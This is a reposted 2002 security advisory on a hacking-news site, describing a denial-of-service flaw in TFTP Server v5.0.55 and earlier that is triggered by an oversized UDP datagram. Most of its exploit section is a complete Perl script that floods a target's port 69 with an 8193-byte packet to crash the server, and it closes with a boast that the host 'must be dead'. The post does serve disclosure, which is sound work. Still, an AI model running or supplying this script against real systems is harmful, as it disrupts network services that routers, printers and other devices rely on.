Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » TFTP Server DoS

TFTP Server DoS

by Nikola Strahija on October 24th, 2002 Vulnerable versions: v.5.0.55 and bellow


#Overview#--------------------------------------------------------------#
>From TFTP Server help:
"Many network devices require a TFTP Server to load their initial
operating system or configuration. Many routers, switches, hubs,
X-terminals, printers, terminal servers, etc need a TFTP server
in order to load their initial configuration".

#Description#------------------------------------------------------------#
First, TFTP - Trivial File Transfer Protocol. This is not FTP! TFTP and
FTP are different protocols - it's very important! TFTP uses UDP protocol
for it's work and it doesn't support some FTP's stuff. Directory travel
for example. U can use TFTP for file transfer only. Read RFC 1350 for
more details.

#Bug#--------------------------------------------------------------------#
It's possible to crash TFTP server using UDP datagram with a large size
(8193b and above). Vulnerable application on remote host will be closed
with error message:

Run-time error '10040':
The datagram is too large to fit into the buffer and is truncated.

#Exploit#----------------------------------------------------------------#

#!/usr/bin/perl
#TFTP Server remote DoS exploit by D4rkGr3y
use IO::Socket;
$host = "vulnerable_host";
$port = "69";
$data = "q";
$num = "8193";
$buf .= $data x $num;
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: [email protected]";
$ipaddr = inet_aton($host);
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!n";
print "Now, '$host' must be dead :)n";

#EOF

Best regards www.dhgroup.org
D4rkGr3y icq 540981


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »